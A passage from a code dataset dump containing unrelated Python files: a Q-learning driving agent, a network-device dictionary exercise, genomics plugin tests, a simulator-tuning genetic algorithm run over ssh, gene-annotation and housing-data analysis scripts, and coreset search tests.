\n    def get_success_rate(self):\n        return \"{}/{} = %{}\".format(self.reach_dest,\n            self.current_trial, (round(float(self.reach_dest)/float(self.current_trial), 3))*100)\n\n    def get_penalty_ratio(self):\n        return \"{}/{} = %{}\".format(self.penalty, self.num_moves,\n            (round(float(self.penalty)/float(self.num_moves),4))*100)\n\n    def get_parameters(self):\n        return self.alpha, self.gamma, self.e\n\n    def update(self, t):\n        # Gather inputs\n        self.next_waypoint = self.planner.next_waypoint()  # from route planner, also displayed by simulator\n        inputs = self.env.sense(self)\n        deadline = self.env.get_deadline(self)\n\n        self.num_moves += 1\n        decayingAlpha = 
self.alpha/self.num_moves\n\n if t == 0:\n self.current_trial += 1\n\n # Update state\n self.state = self.learningAgentState(light=inputs['light'],\n light_violation=self.is_violating_light(inputs['light'], self.next_waypoint),\n row=self.has_right_of_way(inputs, self.next_waypoint),\n next_waypoint=self.next_waypoint)\n # hurry=self.is_late(deadline))\n\n\n # Select action according to your policy\n if self.state not in self.qTable:\n # action = random.choice(self.actions)\n action = self.next_waypoint\n # Initialize new state\n self.qTable[self.state] = [0, 0, 0, 0]\n else:\n sa = self.qTable[self.state]\n # action = self.to_action(str(sa.index(max(sa))))\n action = self.get_action(self.qTable[self.state])\n\n # Execute action and get reward\n reward = self.env.act(self, action)\n # if reward > 5:\n # reward = reward - 10\n\n if reward >= 10:\n self.reach_dest += 1\n elif reward < 10 and reward > 5:\n self.reach_dest += 1\n self.penalty += 1\n elif reward < 0:\n self.penalty += 1\n\n\n # success_rate = \"{}/{} = %{}\".format(self.reach_dest,\n # self.current_trial, (round(float(self.reach_dest)/float(self.current_trial), 3))*100)\n #\n # penalty_ratio = \"{}/{} = %{}\".format(self.penalty, self.num_moves,\n # (round(float(self.penalty)/float(self.num_moves),4))*100)\n #\n # pp.pprint(success_rate, self.logfile)\n # pp.pprint(penalty_ratio, self.logfile)\n\n # Sense environment after action/reward\n inputs_2 = self.env.sense(self)\n deadline_2 = self.env.get_deadline(self)\n next_waypoint_2 = self.planner.next_waypoint()\n\n # store new state\n state_2 = self.learningAgentState(light=inputs_2['light'],\n light_violation=self.is_violating_light(inputs_2['light'], next_waypoint_2),\n row=self.has_right_of_way(inputs_2, next_waypoint_2),\n next_waypoint=next_waypoint_2)\n # hurry=self.is_late(deadline_2))\n\n # Initialize next new state\n if state_2 not in self.qTable:\n self.qTable[state_2] = [0, 0, 0, 0]\n\n # Formula for updating Q-Table\n qsa = (1 - decayingAlpha) * self.qTable[self.state][self.to_pos(str(action))] + decayingAlpha * (reward + self.gamma * max(self.qTable[state_2]))\n\n # Update Q-Table\n self.qTable[self.state][self.to_pos(str(action))] = qsa\n\n # self.beOptimistic(self.state)\n\n # pp.pprint(\"\\n\", self.logfile)\n # pp.pprint(\"LearningAgent.update(): deadline = {}, inputs = {}, action = {}, next_waypoint = {}, reward = {}\".format(deadline, inputs, action, self.next_waypoint, reward), self.logfile) # [debug]\n # pp.pprint(self.qTable, self.logfile)\n # pp.pprint(t, self.logfile)\n # pp.pprint(\"\\n\", self.logfile)\n # TODO: Learn policy based on state, action, reward\n #if inputs['oncoming'] is not None or inputs['right'] is not None or inputs['left'] is not None:\n # print \"LearningAgent.update(): deadline = {}, inputs = {}, action = {}, next_waypoint = {}, reward = {}\".format(deadline, inputs, action, self.next_waypoint, reward) # [debug]\n # print \"Is violating light = {}\".format(self.is_violating_light(inputs['light'], self.next_waypoint))\n # print \"Has right of way = {}\".format(self.has_right_of_way(inputs, self.next_waypoint))\n # print \"Light color = {}\".format(inputs['light'])\n # print \"Should hurry = {}\".format(self.is_late(deadline))\n # print \"\\n\"\n #print self.is_conflict(inputs, self.next_waypoint)\n\n\ndef run():\n \"\"\"Run the agent for a finite number of trials.\"\"\"\n\n # Set up environment and agent\n e = Environment() # create environment (also adds some dummy traffic)\n a = e.create_agent(LearningAgent) # create agent\n 
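The qsa line above is the standard tabular Q-learning backup, Q(s,a) <- (1-alpha)*Q(s,a) + alpha*(r + gamma*max Q(s',·)), with alpha decayed as self.alpha/self.num_moves; the same rule as a standalone helper (the name q_update is illustrative):

def q_update(q_sa, reward, next_q_values, alpha, gamma):
    # One tabular Q-learning backup, mirroring the update in LearningAgent.update()
    return (1 - alpha) * q_sa + alpha * (reward + gamma * max(next_q_values))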
e.set_primary_agent(a, enforce_deadline=True)  # set agent to track\n\n    # Now simulate it\n    sim = Simulator(e, update_delay=0.001)  # reduce update_delay to speed up simulation\n    sim.run(a.n_trials)  # press Esc or close pygame window to quit\n\n    # pp.pprint(\"Success rate: \", a.logfile)\n    # pp.pprint(a.get_success_rate(), a.logfile)\n    # pp.pprint(\"Penalty ratio: \", a.logfile)\n    # pp.pprint(a.get_penalty_ratio(), a.logfile)\n    # pp.pprint(\"Parameters alpha, gamma, and epsilon: \", a.logfile)\n    # pp.pprint(a.get_parameters(), a.logfile)\n    # pp.pprint(\"Number of states explored: \", a.logfile)\n    # pp.pprint(len(a.qTable), a.logfile)\n    # pp.pprint(\"Q-Table: \", a.logfile)\n    # pp.pprint(a.qTable, a.logfile)\n\n\n\nif __name__ == '__main__':\n    run()\n","sub_path":"agent.py","file_name":"agent.py","file_ext":"py","file_size_in_byte":9383,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"316282592","text":"#!/usr/bin/env python\n\nlondon_co = {\n 'r1': {\n 'location': '21 New Globe Walk',\n 'vendor': 'Cisco',\n 'model': '4451',\n 'ios': '15.4',\n 'ip': '10.255.0.1'\n },\n 'r2': {\n 'location': '21 New Globe Walk',\n 'vendor': 'Cisco',\n 'model': '4451',\n 'ios': '15.4',\n 'ip': '10.255.0.2'\n },\n 'sw1': {\n 'location': '21 New Globe Walk',\n 'vendor': 'Cisco',\n 'model': '3850',\n 'ios': '3.6.XE',\n 'ip': '10.255.0.101',\n 'vlans': '10,20,30',\n 'routing': True\n }\n}\n\nkey1 = input('Enter the device name: ')\n\n#After the device name is entered, build a comma-separated string of its parameter names\ndev_params = ','.join(list(london_co[key1].keys()))\n\n#Print a prompt to standard output asking for a device parameter, with the available names as a hint\nkey2 = input('Enter the parameter name: (' + dev_params + '): ')\n\n\n#The dict method get is used here: when a requested key is missing from the dictionary,\n#get returns None instead of raising an error. A message to return instead of the default None\n#can be passed as the second argument\nprint(london_co[key1].get(key2, 'No such parameter'))\n\n","sub_path":"solutions/05_basic_scripts/task_5_1c.py","file_name":"task_5_1c.py","file_ext":"py","file_size_in_byte":1550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"223794736","text":"import os\nimport pytest\nfrom subprocess import check_call\nfrom tempfile import mkdtemp\nfrom shutil import rmtree, copyfile\n\nfrom genomepy.plugin import init_plugins, activate\nfrom genomepy.utils import cmd_ok\nfrom genomepy.functions import Genome\nfrom genomepy.plugins.bwa import BwaPlugin\nfrom genomepy.plugins.gmap import GmapPlugin\nfrom genomepy.plugins.minimap2 import Minimap2Plugin\nfrom genomepy.plugins.bowtie2 import Bowtie2Plugin\nfrom genomepy.plugins.hisat2 import Hisat2Plugin\n\n@pytest.fixture(scope=\"module\")\ndef tempdir():\n    \"\"\"Temporary directory.\"\"\" \n    tmpdir = mkdtemp()\n    yield tmpdir\n    rmtree(tmpdir)\n\n@pytest.fixture(scope=\"module\")\ndef genome(tempdir):\n    \"\"\"Create a test genome.\"\"\" \n    name = \"small_genome\" \n    fafile = \"tests/data/small_genome.fa\"\n    if os.path.exists(fafile + \".gz\"):\n        check_call([\"gunzip\", fafile + \".gz\"])\n\n    os.mkdir(os.path.join(tempdir, name))\n    copyfile(fafile, os.path.join(tempdir, name, os.path.basename(fafile)))\n    for p in init_plugins():\n        activate(p)\n    yield Genome(name, genome_dir=tempdir)  # provide the fixture value\n    if os.path.exists(fafile):\n        check_call([\"gzip\", fafile])\n\ndef test_bwa(genome):\n    \"\"\"Create bwa index.\"\"\" \n    assert os.path.exists(genome.filename)\n\n    if cmd_ok(\"bwa\"):\n        p = BwaPlugin()\n        p.after_genome_download(genome)\n        dirname = os.path.dirname(genome.filename)\n        index_dir = os.path.join(dirname, \"index\" , \"bwa\")\n        assert os.path.exists(index_dir)\n        assert os.path.exists(os.path.join(index_dir, \"{}.fa.sa\".format(genome.name)))\n
\ndef test_minimap2(genome):\n    \"\"\"Create minimap2 index.\"\"\" \n    assert os.path.exists(genome.filename)\n    if cmd_ok(\"minimap2\"):\n        p = Minimap2Plugin()\n        p.after_genome_download(genome)\n        dirname = os.path.dirname(genome.filename)\n        index_dir = os.path.join(dirname, \"index\" , \"minimap2\")\n        assert os.path.exists(index_dir)\n        assert os.path.exists(os.path.join(index_dir, \"{}.mmi\".format(genome.name)))\n\ndef test_bowtie2(genome):\n    \"\"\"Create bowtie2 index.\"\"\" \n    assert os.path.exists(genome.filename)\n    if cmd_ok(\"bowtie2\"):\n        p = Bowtie2Plugin()\n        p.after_genome_download(genome)\n        dirname = os.path.dirname(genome.filename)\n        index_dir = os.path.join(dirname, \"index\" , \"bowtie2\")\n        assert os.path.exists(index_dir)\n        assert os.path.exists(os.path.join(index_dir, \"{}.1.bt2\".format(genome.name)))\n\ndef test_hisat2(genome):\n    \"\"\"Create hisat2 index.\"\"\" \n    assert os.path.exists(genome.filename)\n    if cmd_ok(\"hisat2-build\"):\n        p = Hisat2Plugin()\n        p.after_genome_download(genome)\n        dirname = os.path.dirname(genome.filename)\n        index_dir = os.path.join(dirname, \"index\" , \"hisat2\")\n        assert os.path.exists(index_dir)\n        assert os.path.exists(os.path.join(index_dir, \"{}.1.ht2\".format(genome.name)))\n\ndef test_gmap(genome):\n    \"\"\"Create gmap index.\"\"\" \n    assert os.path.exists(genome.filename)\n    if cmd_ok(\"gmap\"):\n        p = GmapPlugin()\n        p.after_genome_download(genome)\n        dirname = os.path.dirname(genome.filename)\n        index_dir = os.path.join(dirname, \"index\" , \"gmap\", genome.name)\n        assert 
os.path.exists(index_dir)\n assert os.path.exists(os.path.join(index_dir, \"{}.version\".format(genome.name)))\n","sub_path":"tests/test_plugins.py","file_name":"test_plugins.py","file_ext":"py","file_size_in_byte":3385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"22047387","text":"import sys\nimport re\n\ndef print_processed(sentence_dict):\n\n\tfor key,line_text in sentence_dict.items():\n\t\tprint(line_text)\n\ndef read_process_input(file_name):\n\n\tregex_split_tokens = re.compile(r\"([0-9]+)\\s+([0-9]+)\\s+(.+)\\s+([0-9]+)$\")\n\twith open(file_name,'r') as file_hdl:\n\n\t\t# skip first line\n\t\tfile_hdl.readline()\n\t\t\n\t\tsentence_dict = {}\n\t\tfor line in file_hdl:\n\t\t\tline = line.strip()\n\n\t\t\tphraseid,sentenceid,sent_text,sentiment_score = regex_split_tokens.match(line).group(1,2,3,4)\n\n\t\t\tif sentenceid not in sentence_dict:\n\t\t\t\tsentence_dict[sentenceid] = sentiment_score + \" \" + sent_text\n\n\tprint_processed(sentence_dict)\n\n\t\t\t\nif __name__ == '__main__':\n\n\t# Main program takes 5 command line arguments -\n\t# \n\t#if len(sys.argv) != 2:\n\t#\tprint(\"Invalid Arguments!\")\n\t#\texit(1)\n\tfolder_name = sys.argv[1]\n\n\tallfiles = glob.glob(folder_name+\"/*.out\")\n\n\tprint(allfiles)\n\t# file_name = sys.argv[1]\n\n\t#read_process_input(file_name)\n\n","sub_path":"Sentiment/create-train-sent_old.py","file_name":"create-train-sent_old.py","file_ext":"py","file_size_in_byte":1017,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"367462594","text":"# -*- coding: utf-8 -*-\n\"\"\"\n@author: Wei, Shuowen\n\nhttps://leetcode.com/problems/open-the-lock/\n\nhttps://labuladong.gitee.io/algo/4/29/113/\n\nLC111, LC752, LC773\n- BFS\n\"\"\"\nclass Solution(object):\n def openLock(self, deadends, target):\n \"\"\"\n :type deadends: List[str]\n :type target: str\n :rtype: int\n \"\"\"\n from collections import deque\n def getNextOptions(s):\n s_neighbors = []\n for i in range(len(s)):\n oneUp, oneDown = list(s), list(s)\n oneUp[i] = str((int(s[i])+1)%10)\n oneDown[i] = str((int(s[i])-1)%10)\n s_neighbors.append(''.join(oneUp))\n s_neighbors.append(''.join(oneDown))\n return s_neighbors\n \n res = 0 \n q = deque()\n visited = set()\n q.append('0000')\n \n while len(q) > 0:\n queue_size = len(q)\n for i in range(queue_size):\n cur = q.popleft()\n if cur in deadends:\n continue\n elif cur == target:\n return res\n else:\n cur_neighbors = getNextOptions(cur)\n # print(cur, ':', cur_neighbors)\n for cn in cur_neighbors:\n if cn not in visited: # wrong: cn not in deadends and ...\n q.append(cn)\n visited.add(cn)\n res += 1\n return -1","sub_path":"Medium/LC752.py","file_name":"LC752.py","file_ext":"py","file_size_in_byte":1509,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"157452600","text":"\nimport os, sys\nimport subprocess\nimport shlex\n\nimport numpy as np\nimport json\nimport time\n\nimport os.path\n\n# mlist = [''.join(['00', str(x+1)])[-2:] for x in range(8)]\n# l-3d22- ['01','02','03','04','05','06','07','09','11','12','13','14','15','16','18','19']\n# mlist = ['01','02','03','04','05','06','07','08']\nmlist = ['{:0>2d}'.format(x + 1) for x in range(25)] \nplist = {x:None for x in mlist}\nmutstep = 1 # the mutation step\ngnum = 20\ntopps = 6\ncov_limit = 2\n\nevaltime = len(mlist)\n\ndef addproc(gain1, gain2, gain3, gain4, gain5, ra, tmr, eid):\n mid = [d for d in plist.keys() if plist[d] 
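The tempdir and genome fixtures above are module-scoped, so the temporary genome is built once and shared by every test in test_plugins.py; the same pattern in miniature (make_resource is a hypothetical setup function):

import pytest

@pytest.fixture(scope="module")
def resource():
    r = make_resource()   # setup runs once per test module
    yield r               # every test in the module receives the same object
    r.cleanup()           # teardown runs after the last test in the module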
== None]\n    if not mid:\n        return None\n    cmd_line = 'ssh -p 222 -o ConnectTimeout=5 gpan@l-' + \\\n        mid[0] + ' \\'bash -ic \"date; cd simulator.dnn; python test.py m' + \\\n        mid[0] + ' ' + str(gain1) + ' ' + str(gain2) + ' ' +str(gain3) + ' ' + \\\n        str(gain4) + ' ' + str(gain5) + ' ' + str(ra) + ' ' + str(tmr) + ' ' + str(eid) + \\\n        ' 2>error' + str(mid[0]) + '.txt; date;\" \\''\n    #print(cmd_line)\n    proc = subprocess.Popen(\n        shlex.split(cmd_line),\n        stdin = subprocess.PIPE,\n        stdout = subprocess.PIPE,\n        stderr = subprocess.PIPE,\n        close_fds = True)\n    plist[mid[0]] = proc\n    return proc\n\ndef retproc():\n    for d in plist.keys():\n        if plist[d] == None or plist[d].poll() == None:\n            continue\n        output = plist[d].stdout.read().split('\\n')\n        plist[d] = None\n        return output\n    return None\n\ndef ispsok(new_ps):\n    blist = [5,5,5,5,5,5,1,1]\n    ulist = [50,50,50,50,50,30,10,20]\n    for i in range(len(new_ps)):\n        if new_ps[i] < blist[i] or new_ps[i] > ulist[i]:\n            return False\n    return True\n\ndef crossover(p1, p2, ppool):\n    count = 0\n    size = len(p1)\n    while count < 2**size * 3:\n        pid = np.random.randint(2, size = (size,))\n        mutval = np.random.randint(mutstep * 2 + 1, size = (size,)) - mutstep\n        # mutval[-1] = 0\n        new_ps = [[p1[i], p2[i]][pid[i]] + mutval[i] for i in range(size)]\n        # mask gain3 gain4 gain5\n        # new_ps[2] = 10\n        # new_ps[3] = 10\n        new_ps[4] = 10\n        # end of mask gain4 gain5\n        epoch_rand = np.random.randint(20, size = (1,)) + 1\n        new_ps[-1] = epoch_rand[0]\n        if ispsok(new_ps) and not tuple(new_ps) in ppool.keys():\n            return tuple(new_ps)\n        count += 1\n    return None\n
\ndef gettop(ppool, num, cov_time = None):\n    sorted_pool = sorted(ppool.items(), key=lambda kv:sum(kv[1])/len(kv[1]))\n    # print([(x,sum(y)/len(y)) for x, y in sorted_pool[:num]])\n    if cov_time == None:\n        return [x for x, y in sorted_pool[:num]]\n    return [x for x, y in sorted_pool if cov_time[x] < cov_limit][:num]\n\ndef evalppl(pps, ppool, num):\n    for a,b,c,d,e,f,g,h in [x for i in range(num) for x in pps ]:\n        proc = addproc(a,b,c,d,e,f,g,h)\n        while proc == None:\n            output = retproc()\n            if output == None:\n                time.sleep(1)\n                continue\n            # print(output)\n            if len(output) < 3:\n                print('error', output)\n            else:\n                res = output[2].split(':')\n                tname = tuple([int(x) for x in res[1:9]]) # int(res[1]), int(res[2]), int(res[3])])\n                if tname in ppool.keys():\n                    ppool[tname].append(float(res[9]))\n                else:\n                    ppool[tname] = [float(res[9])]\n            proc = addproc(a,b,c,d,e,f,g,h)\n\n    while [d for d in plist.keys() if not plist[d] == None] :\n        output = retproc()\n        if output == None:\n            time.sleep(1)\n        else:\n            # print(output)\n            if len(output) < 3:\n                print('error', output)\n                continue\n            res = output[2].split(':')\n            tname = tuple([int(x) for x in res[1:9]])\n            if tname in ppool.keys():\n                ppool[tname].append(float(res[9]))\n            else:\n                ppool[tname] = [float(res[9])]\n \n\n# RA=10e-12 #ranges from 5e-12 to 20e-12 with \"5e-12\" steps \n# TMR=100\t #ranges from 100 to 400 with \"50\" steps\n# gain1=10 #ranges from 5 to 50 with \"1\" steps\n# gain2=10 #ranges from 5 to 50 with \"1\" steps\n# gain3=10 #ranges from 5 to 50 with \"1\" steps\n# gain4=10 #ranges from 5 to 50 with \"1\" steps\n# gain5=10 #ranges from 5 to 50 with \"1\" steps\ndef run_simulator():\n    print('ST:', time.ctime())\n    rec_json = {}\n    cov_time = {}\n\n    # initial population [(5,5,5),(25,25,25),(35,35,35),(50,50,50)]\n    if os.path.isfile('result.json'):\n        with open('result.json', 'r') as dfile:\n            rec_json = json.load(dfile)\n        stgen, stpool = sorted(rec_json.items(), key = lambda kv:int(kv[0]))[-1]\n        stgen = 
int(stgen) + 1\n ppool = {tuple(x):y for [x,y] in stpool[1]}\n cov_time = {tuple(x):0 for [x,y] in stpool[1]}\n else:\n stgen = 0\n ppl = [(5,5,5,10,10,5,2,9),(15,15,15,10,10,10,4,4),\n (25,25,25,10,10,15,6,17),(30,30,30,10,10,20,4,8),\n (35,35,35,10,10,25,8,12),(40,40,40,10,10,30,8,15)] # initial population\n ppool = {}\n print('generation 0', time.ctime())\n [ evalppl([x], ppool, evaltime) for x in ppl ]\n for x in ppl:\n cov_time[x] = 0\n print(ppl)\n rec_json[stgen] = [ppl, sorted(ppool.items(), key=lambda kv:kv[1])]\n with open('result.json', 'w') as res_file:\n json.dump(rec_json, res_file)\n with open('cov_time.json', 'w') as ct_file:\n json.dump(cov_time.items(), ct_file)\n stgen += 1\n\n for i in range(gnum): \n ppl = gettop(ppool, topps, cov_time)\n print('top ppl to do cross over')\n \n for x in ppl:\n cov_time[x] += 1\n print(x, cov_time[x])\n new_ppl = list(set([crossover(x,y, ppool) for x in ppl for y in ppl if ppl.index(x) < ppl.index(y)]))\n print('generation {}'.format(i+1), time.ctime())\n # evalppl([x for x in new_ppl if not x== None], ppool, 16)\n [ evalppl([x], ppool, evaltime) for x in new_ppl if not x == None ]\n for x in new_ppl:\n if not x == None:\n cov_time[x] = 0\n print(sorted([(x, '{:.4f}'.format(sum(ppool[x])/len(ppool[x]))) for x in new_ppl if not x == None], key = lambda kv:kv[1]))\n # top_new = gettop({x:ppool[x] for x in new_ppl if not x == None}, 5)\n # evalppl([x for x in top_new if not x == None], ppool, 16) \n # print(sorted([(x, sum(ppool[x])/len(ppool[x])) for x in top_new if not x == None], key = lambda kv:kv[1])) \n rec_json[stgen] = [new_ppl, sorted(ppool.items(), key=lambda kv:kv[1])]\n with open('result.json', 'w') as res_file:\n json.dump(rec_json, res_file)\n with open('cov_time.json', 'w') as ct_file:\n json.dump(cov_time.items(), ct_file)\n stgen += 1\n \n gettop(ppool, topps)\n\n # with open('result.json', 'w') as res_file:\n # json.dump(rec_json, res_file)\n \n print('EN:', time.ctime())\n\ndef run_evaluation(params): # params (5,5,5,10,10,10,2)\n print('ST:', time.ctime())\n ppl = [params] \n result = {}\n evalppl(ppl, result, evaltime)\n # print(result)\n for k,v in result.items():\n print(k, sum(v)/len(v))\n # print(result)\n print('EN:', time.ctime())\n\nif __name__ == \"__main__\":\n run_simulator()\n # for params in [(9, 18, 10, 10, 10, 9, 9, 9) ,\n # (10, 34, 10, 10, 10, 9, 9, 11) ,\n # (9, 18, 10, 10, 10, 23, 6, 9) ,\n # (10, 18, 10, 10, 10, 23, 5, 11) ]:\n # params = (10,10,10,10,10,10,2,i)\n # run_evaluation(params)\n \n","sub_path":"run_simulator.py","file_name":"run_simulator.py","file_ext":"py","file_size_in_byte":7023,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"304315887","text":"def gcd(a,b):\n if a==0:\n return b\n elif b==0:\n return a\n else:\n if a>b:\n return gcd(a%b,b)\n else:\n return gcd(a,b%a)\ndef judge(rr):\n for i in range(len(rr)-1):\n for j in range(i+1,len(rr)):\n if gcd(rr[i],rr[j])*gcd(rr[i]+1,rr[j]+1)==1:\n return False\n return True\nn=int(input())\nr=[]\nfor i in range(n):\n r.append(int(input()))\nr.sort()\ncount=0\nprint(gcd(16,6))\nif len(r)==1:\n count=1\nelse:\n for ii in range(len(r)-1):\n for jj in range(ii+1,len(r)):\n rr=r[ii:jj+1]\n if judge(rr):\n if count\")\n elif(line.startswith(\"gene\")):\n lineArr = line.split(\"\\t\")\n first = int(lineArr[1])\n second = int(lineArr[2])\n score = float(lineArr[6])\n sign = lineArr[3]\n length = second - first + 1\n length = int(length)\n if (score > self.cutoff_score and length >= 
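gettop above ranks parameter tuples by the mean of their recorded scores in ascending order (lower is better) and optionally skips tuples that have already been selected cov_limit times; the core ranking in isolation:

def top_k(ppool, k):
    # ppool maps parameter tuples to lists of observed scores; the smaller mean wins
    ranked = sorted(ppool, key=lambda p: sum(ppool[p]) / len(ppool[p]))
    return ranked[:k]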
int(self.cutoff_length)):\n if(sign == \"-\"):\n fMgaOutput.write(readName + \"_\" + str(second) + \"_\" + str(first) + \" Tool=MetaGeneAnnotator \" + \"\\n\")\n else:\n fMgaOutput.write(readName + \"_\" + str(first) + \"_\" + str(second) + \" Tool=MetaGeneAnnotator \" + \"\\n\")\n else:\n pass\n \n fMgaOutput.close()\n\ndef main():\n parser = argparse.ArgumentParser(description = \"User Manual \\n -i = input_file \\n This script requires 1 input files \\n 1. Orginal MGA file \\n 2. Cutoff Score \\n 3. Cutoff length \\n\", formatter_class=argparse.RawDescriptionHelpFormatter)\n parser.add_argument(\"-i\" , dest = \"filename\", help = \"Input_file\" , metavar = \"file\" , nargs =3 , required = True)\n parser.add_argument(\"-o\", dest = \"output_directory\", help = \"output_directory\" , metavar = \"path\" )\n\n args = parser.parse_args()\n mga_original_file = args.filename[0]\n cutoff_score = args.filename[1]\n cutoff_length = args.filename[2]\n mga = mga_parser_with_len(mga_original_file, cutoff_score, cutoff_length)\n mga.parse_original_mga_file()\n \nif __name__ == '__main__':\n main()\n","sub_path":"Scripts for analysis of results/mga_parser_with_score_len_cutoff.py","file_name":"mga_parser_with_score_len_cutoff.py","file_ext":"py","file_size_in_byte":2441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"89054205","text":"# -*- coding: utf-8 -*-\n#!/usr/bin/env python\n\n# https://segmentfault.com/a/1190000015440560\n\nimport os\nimport sys\n\n# 科学计算包numpy,pandas,\n# 可视化matplotlib,seaborn,\n# 以及机器学习包sklearn\n\n\nimport pandas as pd\nfrom pandas import DataFrame\nimport numpy as np\nimport seaborn as sns\nimport matplotlib as mpl\nfrom IPython.display import display\nimport matplotlib.pyplot as plt\n\nplt.style.use(\"fivethirtyeight\")\nsns.set_style({'font.sans-serif':['simhei','Arial']})\n\n'''\n解决中文方块问题\n'''\n## ---- 解决中文方块问题\n\nplt.rcParams['font.family'] = ['Arial Unicode MS'] #解决中文显示方块问题\nplt.rcParams['font.sans-serif'] = ['SimHei'] # 中文字体设置-黑体\nplt.rcParams['axes.unicode_minus'] = False # 解决保存图像是负号'-'显示为方块的问题\n\n## ------\n\n# 检查Python版本\nfrom sys import version_info\nif version_info.major != 3:\n raise Exception('请使用Python 3 来完成此项目')\n\n\n# 导入二手房数据\nlianjia_df = pd.read_csv('lianjia.csv')\ndisplay(lianjia_df.head(n=2))\n\n# 检查缺失值情况\n#lianjia_df.info()\n\n# 数据描述\n# print(lianjia_df.describe())\n\n\n# 添加新特征房屋均价\ndf = lianjia_df.copy()\ndf['PerPrice'] = lianjia_df['Price']/lianjia_df['Size']\n\n# 重新摆放列位置\ncolumns = ['Region', 'District', 'Garden', 'Layout', 'Floor', 'Year', 'Size', 'Elevator', 'Direction', 'Renovation', 'PerPrice', 'Price']\ndf = pd.DataFrame(df, columns = columns)\n\n# 重新审视数据集\ndisplay(df.head(n=2))\n\n\n\n\"\"\"\n特征工程\n\"\"\"\n# 移除结构类型异常值和房屋大小异常值\ndf = df[(df['Layout']!='叠拼别墅')&(df['Size']<1000)]\n\n# 去掉错误数据“南北”,因为爬虫过程中一些信息位置为空,导致“Direction”的特征出现在这里,需要清除或替换\ndf['Renovation'] = df.loc[(df['Renovation'] != '南北'), 'Renovation']\n\n# 由于存在个别类型错误,如简装和精装,特征值错位,故需要移除\ndf['Elevator'] = df.loc[(df['Elevator'] == '有电梯')|(df['Elevator'] == '无电梯'), 'Elevator']\n\n# 填补Elevator缺失值\ndf.loc[(df['Floor']>6)&(df['Elevator'].isnull()), 'Elevator'] = '有电梯'\ndf.loc[(df['Floor']<=6)&(df['Elevator'].isnull()), 'Elevator'] = '无电梯'\n\n\n# print(df['Layout'].value_counts())\n\n# 只考虑“室”和“厅”,将其它少数“房间”和“卫”移除\n# df = df.loc[df['Layout'].str.extract('^\\d(.*?)\\d.*?') == '室']\n\n# print(df['Layout'].value_counts())\n\n# 提取“室”和“厅”创建新特征\ndf['Layout_room_num'] = df['Layout'].str.extract('(^\\d).*', 
expand=False).astype('int64')\ndf['Layout_hall_num'] = df['Layout'].str.extract('^\\d.*?(\\d).*', expand=False).astype('int64')\n\n# print(df['Layout_room_num'].value_counts())\n# print(df['Layout_hall_num'].value_counts())\n\n# 按中位数对“Year”特征进行分箱\ndf['Year'] = pd.qcut(df['Year'],8).astype('object')\n\nprint(df['Year'].value_counts())\n\n# 对“Direction”特征\nd_list_one = ['东','西','南','北']\nd_list_two = ['东西','东南','东北','西南','西北','南北']\nd_list_three = ['东西南','东西北','东南北','西南北']\nd_list_four = ['东西南北']\n# df['Direction'] = df['Direction'].apply(direct_func)\n# df = df.loc[(df['Direction']!='no')&(df['Direction']!='nan')]\n\n# 根据已有特征创建新特征\ndf['Layout_total_num'] = df['Layout_room_num'] + df['Layout_hall_num']\ndf['Size_room_ratio'] = df['Size']/df['Layout_total_num']\n\n# 删除无用特征\ndf = df.drop(['Layout','PerPrice','Garden'],axis=1)\n\n# 对于object特征进行onehot编码\n# df,df_cat = one_hot_encoder(df)\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"analysis/lianjia/lianjia02.py","file_name":"lianjia02.py","file_ext":"py","file_size_in_byte":3601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"417384586","text":"import numpy as np\nfrom bayesiancoresets import gigasearch as gs\n\n####\n###This test is no longer used (tree-based search is not used in the main code)\n####\n\nnp.random.seed(1)\n\nn_trials = 50\ntol = 1e-9\ntests = [(N, D, dist) for N in [10, 100] for D in [3, 10] for dist in ['gauss', 'bin', 'gauss_colinear', 'bin_colinear', 'axis_aligned']]\n\n\ndef gendata(N, D, dist=\"gauss\"):\n if dist == \"gauss\":\n x = np.random.normal(0., 1., (N, D))\n elif dist == \"bin\":\n x = np.zeros((N, D))\n nz = (x**2).sum(axis=1) == 0.\n while nz.sum() > 0:\n x[nz, :] = (np.random.rand(nz.sum(), D) > 0.5).astype(float)\n nz = (x**2).sum(axis=1) == 0.\n elif dist == \"gauss_colinear\":\n x = np.random.normal(0., 1., D)\n y = np.random.rand(N)*2.-1.\n x = y[:, np.newaxis]*x\n elif dist == \"bin_colinear\":\n x = (np.random.rand(D) > 0.5).astype(float)\n while (x**2).sum() == 0:\n x = (np.random.rand(D) > 0.5).astype(float)\n y = np.random.rand(N)*2.-1.\n x = y[:, np.newaxis]*x\n else:\n x = np.zeros((N, N))\n for i in range(N):\n x[i, i] = 1./float(N)\n return x/np.sqrt((x**2).sum(axis=1))[:, np.newaxis]\n\n\ndef gigasearch_single(N, D, dist=\"gauss\"):\n x = gendata(N, D, dist)\n srch = gs.GIGASearch(x)\n for m in range(n_trials):\n yw = np.random.normal(0., 1., x.shape[1])\n yw /= np.sqrt((yw**2).sum())\n y_yw = np.random.normal(0., 1., x.shape[1])\n y_yw -= y_yw.dot(yw)*yw\n y_yw /= np.sqrt((y_yw**2).sum())\n n_ot = srch.search(yw, y_yw)\n f_ot = x[n_ot, :].dot(y_yw)/np.sqrt(1.-x[n_ot, :].dot(yw)**2)\n n_ol = (x.dot(y_yw)/np.sqrt(1.-x.dot(yw)**2)).argmax()\n f_ol = x[n_ol, :].dot(y_yw)/np.sqrt(1.-x[n_ol, :].dot(yw)**2)\n assert f_ol - f_ot < tol, \"gigasearch failed; true obj = \" + str(f_ol) + \" gigasearch obj = \" + str(f_ot)\n \ndef test_gigasearch():\n for N, D, dist in tests:\n for n in range(n_trials):\n yield gigasearch_single, N, D, dist\n\n\ndef test_gigasearch_stability():\n X = np.random.rand(10, 5)\n\n #test stability with immediate garbage collection\n for i in range(100):\n gs.GIGASearch(X)\n \n #test stability with 